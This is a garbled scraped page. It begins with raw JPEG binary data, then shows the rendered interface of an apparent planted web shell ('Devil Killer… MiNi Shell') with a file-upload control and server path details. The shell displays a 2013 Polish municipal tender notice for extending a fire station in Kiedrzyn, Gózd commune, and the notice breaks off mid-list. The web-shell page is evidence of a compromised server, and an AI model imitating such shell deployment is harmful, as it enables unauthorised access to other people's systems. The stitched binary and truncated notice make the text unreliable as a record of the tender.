JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130819/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130819/333536-N-2013.html

<p class="kh_header"><b>Gózd: Rozbudowa budynku Remizy Strażackiej  z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd, w tym:

Zadanie I - Rozbudowa budynku remizy strażackiej wraz z zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd,
Zadanie II - Dostawa wyposażenia w ramach zadania pod nazwą: Rozbudowa budynku Remizy Strażackiej  z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd</b><br>
<b>Numer ogłoszenia: 333536 - 2013; data zamieszczenia: 19.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gózd , ul. Radomska 7, 26-634 Gózd, woj. mazowieckie, tel. 048 3202097, faks 048 3202097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gozd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku Remizy Strażackiej  z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd, w tym:

Zadanie I - Rozbudowa budynku remizy strażackiej wraz z zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd,
Zadanie II - Dostawa wyposażenia w ramach zadania pod nazwą: Rozbudowa budynku Remizy Strażackiej  z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie zadania pod nazwą: Rozbudowa budynku Remizy Strażackiej  z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd, w tym:

Zadanie I - Rozbudowa budynku remizy strażackiej wraz z zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd, w tym:
 - roboty ziemne,
 - fundamenty,
 - podłoża, izolacja,
 - roboty murowe,
 - dach,
 - stolarka,
 - roboty wewnętrzne wykończeniowe,
 - elewacja i roboty zewnętrzne,
 - instalacja elektryczna.

Szczegółowy zakres prac niezbędnych do wykonania przedmiotu zamówienia określa:  przedmiar robót oraz projekt techniczny  będące załącznikami do specyfikacji.
Jeżeli w dokumentacji, o której mowa wyżej zastosowano nazwy producentów lub inne nazwy własne, należy przyjąć, że służą one wyłącznie doprecyzowaniu opisu przedmiotu zamówienia a zamówienie należy wykonać z materiałów wskazanych w dokumentacji lub równoważnych o parametrach nie gorszych niż wskazane.
Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym, posiadać odpowiednie certyfikaty  i atesty materiałowe do stosowania w budownictwie a także zapewnić sprawność eksploatacyjną.

Zadanie II - Dostawa wyposażenia w ramach zadania pod nazwą:  Rozbudowa budynku Remizy Strażackiej z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd
Przedmiot zamówienia obejmuje dostawę następującego wyposażenia: 

1. Stół 4 -osobowy - Stelaż wykonany z rury stalowej, malowany farbą proszkową; blat wykonany z płyty wiórowej laminowanej; wymiary 80 x  80 cm - 10szt. 	
2. Krzesło - Krzesło konferencyjne, oparcie i siedzisko tapicerowane gąbką i tkaniną; rama wykonana z profili stalowych - 40 szt.
3. Zestaw mebli kuchennych - Zestaw mebli kuchennych - szafki dolne i szafki wiszące wykonane z płyty MDF, dłg. zestawu ok. 300 cm; kolorystyka np. jasny dąb lub podobny, meble kuchenne mają stanowić komplet	 - 1 kpl.
4. Regał świetlicowy - Regał wykonany z płyty laminowanej; posiada szafki oraz półki; wymiary ok. szer. 80 cm, wys. 170 cm, kolorystyka  np. jasny dąb lub podobny - 2 szt.
5. Biurko pod komputer - Biurko o wym. ok. dłg. 110 cm, wys. 75 cm,  wykonane głównie z płyty wiórowej dwustronnie laminowanej, pod blatem wysuwana półka na klawiaturę i mysz, posiada szafkę  i półkę; kolorystyka  np. jasny dąb lub podobny - 4 szt.
6. Krzesło obrotowe - Krzesło obrotowe tapicerowane, posiada możliwość regulacji wysokości siedziska i oparcia oraz podłokietniki - 4 szt.
7. Zestaw komputerowy - Jednostka centralna: procesor dwurdzeniowy INTEL, pamięć 4 GB RAM, dysk twardy 500 GB, nagrywarka DVD, zintegrowana karta graficzna, obudowa; zasilacz 400 WAT ATX; monitor 22 cale; klawiatura; mysz; oprogramowanie Windows 7 Home Premium - 4 kpl.	
8. Telewizor LCD - Telewizor LCD kolor obudowy czarny; ekran min. 42 cale; rozdzielczość Full HD 1920x1080; menu w języku polskim; uchwyt-wieszak do telewizora LCD - 1 szt.
9. Zestaw kina domowego - Zestaw kina domowego składający się z amplitunera, odtwarzacza DVD oraz zestawu głośników; obsługuje płyty DVD i CD oraz pliki w formacie DivX, MPEG4 AAC, MP3, WMA  i JPEG; posiada radio z pamięcią, złącza HDMI i component video - 1 kpl.
10. Okap kuchenny	 - Okap kominowy; obudowa - stal nierdzewna; o szerokości do  60 cm - 1 szt.
11. Lodówka - Chłodziarko-zamrażarka o wymiarach: wys. 186 cm, szer. 60 cm, gł. 65 cm z systemem No Frost, w klasie energetycznej min. A - 1 szt.
12. Kuchenka gazowa z elektrycznym piekarnikiem - Kuchnia wolnostojąca, płyta gazowa - ilość pól grzejnych - 4, piekarnik elektryczny; wys. 85 cm, szer. 60 cm, gł. 60 cm; klasa energetyczna min. A - 1 szt.
13. Stół do tenisa stołowego - Wymiary stołu min. 274x152x76 cm wykonany z płyty MDF na konstrukcji stalowej; 3 piłeczki, siatka, 4 rakietki do tenisa stołowego - 1 kpl.
14. Bilard - Stół  o wymiarach min. 130x240x80 cm, kolor sukna - zielony; komplet bil, 4 kije, trójkąt; stojak, szczotka do sukna, kreda - 1 kpl.
Wykonawca ma obowiązek dostarczyć asortyment fabrycznie nowy - rok produkcji nie później niż 2012r. Wszystkie oferowane towary muszą być nieregenerowane, wolne od wad fizycznych i zobowiązań prawnych, nie mają do nich praw osoby trzecie oraz nie są przedmiotem żadnego postępowania i zabezpieczenia.
Jeżeli w SIWZ podane są nazwy producentów lub inne nazwy własne, należy przyjąć, że służą one wyłącznie doprecyzowaniu opisu przedmiotu zamówienia, a zamówienie należy wykonać z towarów wskazanych w dokumentacji lub równoważnych.
Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym, aby zapewnić sprawność eksploatacyjną. 
Towary będące przedmiotem zamówienia winny być odpowiedni oznaczone i posiadać wszelkie dokumenty określone szczegółowymi przepisami dotyczącymi trybu dopuszczenia ich do stosowania, takie jak: np. certyfikaty zgodności z normami lub aprobatami technicznymi, atesty, świadectwa PZH itp.
Wykonawca udziela gwarancji na niniejszy przedmiot zamówienia na okres wynikający z kart gwarancyjnych producenta, w przypadku ich braku na okres 36 miesięcy od dnia podpisania bezusterkowego protokółu odbioru końcowego i obejmuje cały przedmiot zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.12.91-4, 39.15.00.00-8, 31.71.00.00-6, 37.46.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium:
Zadanie I -  w wysokości 5.000,00 PLN (słownie: pięć tysięcy  złotych 00/100)
Zadanie II - w wysokości 1.000,00 PLN (słownie: jeden tysiąc złotych 00/100)
Wadium  należy wnieść do dnia  09.09.2013r. do godz.10:00 w podanej niżej formie.
W pieniądzu.
W poręczeniu bankowym lub w poręczeniu Spółdzielczej kasy Oszczędnościowo Kredytowej w tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym.
W gwarancjach bankowych.
W gwarancjach ubezpieczeniowych.
W poręczeniach udzielanych przez podmioty o których mowa w art.6b  ust.5 pkt.2, Ustawy z dnia 9 listopada 2000r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz.U. z 2007r.  Nr 42 poz.275).
Wadium wnoszone w pieniądzu należy wnieść w formie przelewu bankowego na wydzielony rachunek zamawiającego:
Bank PKO S.A. II Oddział w Radomiu Nr rachunku 72 1240 3259 1111 0010 0618 1333, które powinno się znaleźć na koncie zamawiającego w dniu otwarcia ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku zadania I - za spełnienie warunku posiadania niezbędnego doświadczenia zamawiający uzna wykonanie w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przed upływem składania ofert minimum jednej roboty budowlanej, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone.
W przypadku zadania II - za spełnienie warunku posiadania niezbędnego doświadczenia zamawiający uzna wykonanie w okresie ostatnich trzech lat minimum jednej dostawy, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, an rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku zadania I - za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie minimum jedną osobą - która posiada uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy określone zostały w załączonych wzorach umów (załączniki nr 8, 8A)
Istnieje możliwość wprowadzenia zmian postanowień zawartych umów w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
Kierując się zapisami art.144 ust.1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych tekst jednolity: Dz.U.2010r. Nr 113 poz. 759 z póź. zm. Zamawiający dopuszcza dokonanie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących sytuacjach:
	1) Zmiana terminu realizacji umowy:
	a) jeżeli zmiana jest konieczna z powodu działania siły wyższej tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było uniknąć w szczególności niesprzyjających warunków atmosferycznych i klęsk żywiołowych, katastrofy budowlanej uniemożliwiających terminowe wykonanie przedmiotu umowy.
	2) zmiany stawki VAT w przypadku zmiany przepisów w tym zakresie.
Warunkiem dokonania zmian postanowień zawartej umowy jest protokół konieczności podpisany przez przedstawicieli Zamawiającego i Wykonawcy.
Protokół powinien zawierać szczegółowe uzasadnienie konieczności wprowadzenia zmiany umowy.
Ostateczną decyzję w sprawie dokonania zmian postanowień umowy podejmuje Kierownik Zamawiającego zatwierdzając protokół konieczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gozd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Goździe 
ul. Radomska 7
26-634 Gózd.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2013 godzina 10:00, miejsce: Urząd Gminy w Goździe 
ul. Radomska 7
26-634 Gózd.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie 413 Wdrażanie Lokalnych Strategii Rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbudowa budynku remizy strażackiej wraz z zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I - Rozbudowa budynku remizy strażackiej wraz z zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd, w tym:
 - roboty ziemne,
 - fundamenty,
 - podłoża, izolacja,
 - roboty murowe,
 - dach,
 - stolarka,
 - roboty wewnętrzne wykończeniowe,
 - elewacja i roboty zewnętrzne,
 - instalacja elektryczna.

Szczegółowy zakres prac niezbędnych do wykonania przedmiotu zamówienia określa:  przedmiar robót oraz  projekt techniczny, będące załącznikami do specyfikacji.
Jeżeli w dokumentacji, o której mowa wyżej zastosowano nazwy producentów lub inne nazwy własne, należy przyjąć, że służą one wyłącznie doprecyzowaniu opisu przedmiotu zamówienia a zamówienie należy wykonać z materiałów wskazanych w dokumentacji lub równoważnych o parametrach nie gorszych niż wskazane.
Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym, posiadać odpowiednie certyfikaty  i atesty materiałowe do stosowania w budownictwie a także zapewnić sprawność eksploatacyjną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.12.91-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - Dostawa wyposażenia w ramach zadania pod nazwą:  Rozbudowa budynku Remizy Strażackiej z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II - Dostawa wyposażenia w ramach zadania pod nazwą:  Rozbudowa budynku Remizy Strażackiej  z przystosowaniem pomieszczeń na Świetlicę wiejską  wraz z wyposażeniem i zagospodarowaniem terenu w miejscowości Kiedrzyn, gmina Gózd
Przedmiot zamówienia obejmuje dostawę następującego wyposażenia: 

